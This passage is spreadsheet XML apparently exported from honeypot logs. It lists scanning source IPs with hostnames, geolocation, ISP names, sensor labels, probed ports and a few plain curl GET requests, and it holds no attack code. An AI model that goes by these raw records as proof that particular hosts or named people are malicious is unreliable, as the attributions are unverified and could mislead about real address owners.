    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H6&amp;&amp;SMA-LAB_MT-CPA_H22&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H39</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;53563&amp;&amp;23&amp;&amp;NA&amp;&amp;9100</t>
  </si>
  <si>
    <t>::ffff:dc85:b912</t>
  </si>
  <si>
    <t>611f7ca9920918898202c2b0b7704cb6</t>
  </si>
  <si>
    <t>114.32.64.98</t>
  </si>
  <si>
    <t>114-32-64-98.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_SSH_H34&amp;&amp;SMA-LAB_MT-CPA_H40&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H17</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;22&amp;&amp;23575&amp;&amp;9100&amp;&amp;80</t>
  </si>
  <si>
    <t>::ffff:7220:4062</t>
  </si>
  <si>
    <t>87dc7b49863de743ee5b912f5f90f280</t>
  </si>
  <si>
    <t>114.32.198.204</t>
  </si>
  <si>
    <t>114-32-198-204.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_DNS_H39&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H36</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;53&amp;&amp;13178&amp;&amp;50853&amp;&amp;57914&amp;&amp;57930&amp;&amp;80&amp;&amp;9100</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7220:c6cc</t>
  </si>
  <si>
    <t>ad214abfa54100d4ddc38efff4a275f4</t>
  </si>
  <si>
    <t>117.207.169.234</t>
  </si>
  <si>
    <t>::ffff:75cf:a9ea</t>
  </si>
  <si>
    <t>1b67111a35c84c0f890ca200b559b9d1</t>
  </si>
  <si>
    <t>117.192.131.113</t>
  </si>
  <si>
    <t>::ffff:75c0:8371</t>
  </si>
  <si>
    <t>83d57795c28de58363eff65059c31dc0</t>
  </si>
  <si>
    <t>117.196.146.36</t>
  </si>
  <si>
    <t>::ffff:75c4:9224</t>
  </si>
  <si>
    <t>5f32ab26ada4c5319f8c42ced5aebde1</t>
  </si>
  <si>
    <t>220.134.100.207</t>
  </si>
  <si>
    <t>220-134-100-207.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H5&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H41</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;46056&amp;&amp;23&amp;&amp;80&amp;&amp;9100&amp;&amp;3830</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:dc86:64cf</t>
  </si>
  <si>
    <t>0ae75b7dd5c513fcb938d7a5bd8dea59</t>
  </si>
  <si>
    <t>125.229.164.48</t>
  </si>
  <si>
    <t>NA&amp;&amp;125-229-164-48.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_SMTP_H27&amp;&amp;SMA-LAB_HTTP_H18&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H34</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;23&amp;&amp;25&amp;&amp;9100&amp;&amp;58774&amp;&amp;NA&amp;&amp;18064&amp;&amp;20145</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7de5:a430</t>
  </si>
  <si>
    <t>44f5849871fb2bed960b958cec01388a</t>
  </si>
  <si>
    <t>61.221.225.247</t>
  </si>
  <si>
    <t>NA&amp;&amp;61-221-225-247.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_MT-CPA_H22&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H47</t>
  </si>
  <si>
    <t>23&amp;&amp;45871&amp;&amp;9100</t>
  </si>
  <si>
    <t>2001-05-15</t>
  </si>
  <si>
    <t>::ffff:3ddd:e1f7</t>
  </si>
  <si>
    <t>ea2355a6e860afc60433d30e414e3151</t>
  </si>
  <si>
    <t>117.212.216.185</t>
  </si>
  <si>
    <t>::ffff:75d4:d8b9</t>
  </si>
  <si>
    <t>98177070e4a7d66547347f5a81893133</t>
  </si>
  <si>
    <t>117.243.123.149</t>
  </si>
  <si>
    <t>::ffff:75f3:7b95</t>
  </si>
  <si>
    <t>d0221e0806817e9c4d19c2b45603240b</t>
  </si>
  <si>
    <t>14.139.237.102</t>
  </si>
  <si>
    <t>Varanasi (Kashi Vidyapith)</t>
  </si>
  <si>
    <t>25.3212</t>
  </si>
  <si>
    <t>82.9896</t>
  </si>
  <si>
    <t>NKN-MGKV-UP</t>
  </si>
  <si>
    <t>::ffff:e8b:ed66</t>
  </si>
  <si>
    <t>d41e6bcbd738f4d332e3aa3ee97bf0a3</t>
  </si>
  <si>
    <t>182.56.253.45</t>
  </si>
  <si>
    <t>::ffff:b638:fd2d</t>
  </si>
  <si>
    <t>ce20b53a0dd35be3c3da142d48da3f73</t>
  </si>
  <si>
    <t>91.231.202.181</t>
  </si>
  <si>
    <t>AV</t>
  </si>
  <si>
    <t>Armavir</t>
  </si>
  <si>
    <t>Metsamor Municipality</t>
  </si>
  <si>
    <t>Aygeshat</t>
  </si>
  <si>
    <t>616851</t>
  </si>
  <si>
    <t>40.0751</t>
  </si>
  <si>
    <t>44.0611</t>
  </si>
  <si>
    <t>210315</t>
  </si>
  <si>
    <t>Arpinet LLC</t>
  </si>
  <si>
    <t>RealTime ISP</t>
  </si>
  <si>
    <t>2018-04-23</t>
  </si>
  <si>
    <t>::ffff:5be7:cab5</t>
  </si>
  <si>
    <t>f2d1296b0d6b54b451ccb291f61d754f</t>
  </si>
  <si>
    <t>60.49.219.77</t>
  </si>
  <si>
    <t>::ffff:3c31:db4d</t>
  </si>
  <si>
    <t>3f554abf6ef9989e44206b9e5f80fc97</t>
  </si>
  <si>
    <t>125.27.7.29</t>
  </si>
  <si>
    <t>NA&amp;&amp;node-1el.pool-125-27.dynamic.nt-isp.net</t>
  </si>
  <si>
    <t>::ffff:7d1b:71d</t>
  </si>
  <si>
    <t>1a6c2b5f3879d92d1dd8e666a446c993</t>
  </si>
  <si>
    <t>188.56.42.98</t>
  </si>
  <si>
    <t>Konya</t>
  </si>
  <si>
    <t>306571</t>
  </si>
  <si>
    <t>37.8746</t>
  </si>
  <si>
    <t>32.4932</t>
  </si>
  <si>
    <t>::ffff:bc38:2a62</t>
  </si>
  <si>
    <t>68d23af16ebe9b8b1f12461108729537</t>
  </si>
  <si>
    <t>14.183.12.3</t>
  </si>
  <si>
    <t>Châu Thành District</t>
  </si>
  <si>
    <t>Cái Tàu Hạ</t>
  </si>
  <si>
    <t>1586502</t>
  </si>
  <si>
    <t>10.2597</t>
  </si>
  <si>
    <t>105.87</t>
  </si>
  <si>
    <t>::ffff:eb7:c03</t>
  </si>
  <si>
    <t>8b087dccfd072a4775584a651273b1c2</t>
  </si>
  <si>
    <t>117.219.174.163</t>
  </si>
  <si>
    <t>::ffff:75db:aea3</t>
  </si>
  <si>
    <t>35854184ac4dca2616c8e94eebae2bb5</t>
  </si>
  <si>
    <t>121.160.177.106</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_MT-CPA_H47&amp;&amp;SMA-LAB_SNMP_H7&amp;&amp;SMA-LAB_MT-CPA_H25&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H40</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;55818&amp;&amp;55837&amp;&amp;55839&amp;&amp;161&amp;&amp;57561&amp;&amp;36088&amp;&amp;36113</t>
  </si>
  <si>
    <t>::ffff:79a0:b16a</t>
  </si>
  <si>
    <t>9137c5cc6420482389e86fc207d9c60f</t>
  </si>
  <si>
    <t>103.85.133.83</t>
  </si>
  <si>
    <t>Rewari</t>
  </si>
  <si>
    <t>Bāwal</t>
  </si>
  <si>
    <t>1276666</t>
  </si>
  <si>
    <t>28.1094</t>
  </si>
  <si>
    <t>76.6025</t>
  </si>
  <si>
    <t>150562</t>
  </si>
  <si>
    <t>NRH TELECOM PRIVATE LIMITED</t>
  </si>
  <si>
    <t>NRH Telecom Private Limited</t>
  </si>
  <si>
    <t>2022-08-03</t>
  </si>
  <si>
    <t>NITIN121</t>
  </si>
  <si>
    <t>::ffff:6755:8553</t>
  </si>
  <si>
    <t>b0568f9d1d2526f724edffe3eba1d57c</t>
  </si>
  <si>
    <t>190.154.48.146</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H33&amp;&amp;SMA-LAB_SNMP_H41&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H29</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;161</t>
  </si>
  <si>
    <t>Ecuador</t>
  </si>
  <si>
    <t>Azuay</t>
  </si>
  <si>
    <t>Cuenca</t>
  </si>
  <si>
    <t>10793423</t>
  </si>
  <si>
    <t>010103</t>
  </si>
  <si>
    <t>-2.88758</t>
  </si>
  <si>
    <t>-78.9791</t>
  </si>
  <si>
    <t>14522</t>
  </si>
  <si>
    <t>Satnet</t>
  </si>
  <si>
    <t>Satnet Cuenca Cor-carlos Rodrigo Narvaez Chavez</t>
  </si>
  <si>
    <t>::ffff:be9a:3092</t>
  </si>
  <si>
    <t>e9a4291f3554af1e8dc9dddba88b3d2c</t>
  </si>
  <si>
    <t>117.207.185.247</t>
  </si>
  <si>
    <t>::ffff:75cf:b9f7</t>
  </si>
  <si>
    <t>7b15942f0ecb7ebb677e0b57c740a258</t>
  </si>
  <si>
    <t>59.183.159.175</t>
  </si>
  <si>
    <t>Māchhīwāra</t>
  </si>
  <si>
    <t>1264644</t>
  </si>
  <si>
    <t>30.9156</t>
  </si>
  <si>
    <t>76.2002</t>
  </si>
  <si>
    <t>::ffff:3bb7:9faf</t>
  </si>
  <si>
    <t>fb111fb8d3a12b290c5053c793b969a3</t>
  </si>
  <si>
    <t>117.194.149.122</t>
  </si>
  <si>
    <t>::ffff:75c2:957a</t>
  </si>
  <si>
    <t>ae6006cf4bb7ad2885e180e85be1b921</t>
  </si>
  <si>
    <t>125.138.220.176</t>
  </si>
  <si>
    <t>::ffff:7d8a:dcb0</t>
  </si>
  <si>
    <t>fe5da982f944563be1521f2392227c34</t>
  </si>
  <si>
    <t>59.183.125.28</t>
  </si>
  <si>
    <t>::ffff:3bb7:7d1c</t>
  </si>
  <si>
    <t>749dba83a99cc539bbc9c28bddd3d789</t>
  </si>
  <si>
    <t>59.182.250.185</t>
  </si>
  <si>
    <t>::ffff:3bb6:fab9</t>
  </si>
  <si>
    <t>7dcab62dc5538e8cbbfb55f49312d203</t>
  </si>
  <si>
    <t>120.61.33.193</t>
  </si>
  <si>
    <t>::ffff:783d:21c1</t>
  </si>
  <si>
    <t>8939a1849ad6118654efc29bbca6fecc</t>
  </si>
  <si>
    <t>59.180.160.21</t>
  </si>
  <si>
    <t>::ffff:3bb4:a015</t>
  </si>
  <si>
    <t>1a3a72e6e1c58729f212d4cacc52dbf1</t>
  </si>
  <si>
    <t>220.135.64.179</t>
  </si>
  <si>
    <t>220-135-64-179.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H19&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_MT-CPA_H35&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H39</t>
  </si>
  <si>
    <t>47213&amp;&amp;23&amp;&amp;25593&amp;&amp;57598&amp;&amp;60358</t>
  </si>
  <si>
    <t>::ffff:dc87:40b3</t>
  </si>
  <si>
    <t>0dd26cc739dc289360b06fd9395a94bf</t>
  </si>
  <si>
    <t>125.229.248.189</t>
  </si>
  <si>
    <t>125-229-248-189.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_SMB_H7&amp;&amp;SMA-LAB_HTTPS_H27&amp;&amp;SMA-LAB_IPP_H19&amp;&amp;SMA-LAB_HTTP_H1&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_SOCKS5_H19&amp;&amp;SMA-LAB_PJL_H7&amp;&amp;SMA-LAB_DNS_H42&amp;&amp;SMA-LAB_LDAP_H1&amp;&amp;SMA-LAB_SSH_H34&amp;&amp;SMA-LAB_MT-CPA_H22&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H22</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;445&amp;&amp;443&amp;&amp;631&amp;&amp;80&amp;&amp;5900&amp;&amp;1080&amp;&amp;9100&amp;&amp;53&amp;&amp;389&amp;&amp;22&amp;&amp;27542&amp;&amp;23&amp;&amp;NA&amp;&amp;53589&amp;&amp;53596&amp;&amp;53606&amp;&amp;53621&amp;&amp;53631&amp;&amp;53643&amp;&amp;53656&amp;&amp;53673&amp;&amp;53689</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7de5:f8bd</t>
  </si>
  <si>
    <t>f0af1de4774250e46d7d94ae864bf929</t>
  </si>
  <si>
    <t>59.126.128.101</t>
  </si>
  <si>
    <t>NA&amp;&amp;59-126-128-101.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;abuseipdb&amp;&amp;SMA-LAB_HTTP_H3&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_SMTP_H38&amp;&amp;SMA-LAB_SOCKS5_H12&amp;&amp;SMA-LAB_MT-CPA_H35&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H21</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;NA&amp;&amp;80&amp;&amp;25&amp;&amp;1080&amp;&amp;64162&amp;&amp;23&amp;&amp;9100</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}</t>
  </si>
  <si>
    <t>::ffff:3b7e:8065</t>
  </si>
  <si>
    <t>7f4b06b2cc8a2ad729744d8d9dae089a</t>
  </si>
  <si>
    <t>59.127.112.121</t>
  </si>
  <si>
    <t>NA&amp;&amp;59-127-112-121.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H28</t>
  </si>
  <si>
    <t>17844&amp;&amp;23&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:3b7f:7079</t>
  </si>
  <si>
    <t>0427e40deaa51e1a1054662b29db13b9</t>
  </si>
  <si>
    <t>1.34.200.86</t>
  </si>
  <si>
    <t>1-34-200-86.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
